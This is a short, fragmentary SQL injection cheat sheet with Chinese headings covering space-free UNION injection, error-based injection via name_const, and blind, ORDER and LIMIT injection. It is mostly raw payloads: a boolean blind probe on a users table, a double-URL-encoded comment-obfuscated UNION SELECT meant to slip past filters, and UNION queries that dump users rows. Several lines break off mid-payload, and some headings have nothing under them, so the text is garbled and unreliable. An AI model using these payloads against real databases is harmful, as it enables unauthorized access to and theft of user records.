(exists(select(1)from(users)where(ascii(lower(substring(user_id,1,1))))like(50) ))and'1'<'2'
无需空格之联合注入...id=1%252f%252a*/union%252f%252a /select%252f%252a*/1,2,3%252f%252a*/from%252f%252a*/users--
数据库名字中的连字符...par=1 union select unhex(hex(version()))
报错注入
name_const (MySQL 5.0.12 > 5.0.64)
(select name_const(...par=1 union select 6,users.*,2,3,4,5,1 from users
Order 注入
# 盲注:
script.php?...par=(select*from(select name_const(version(),1),name_const(version(),1))a)
limit 注入
script.php?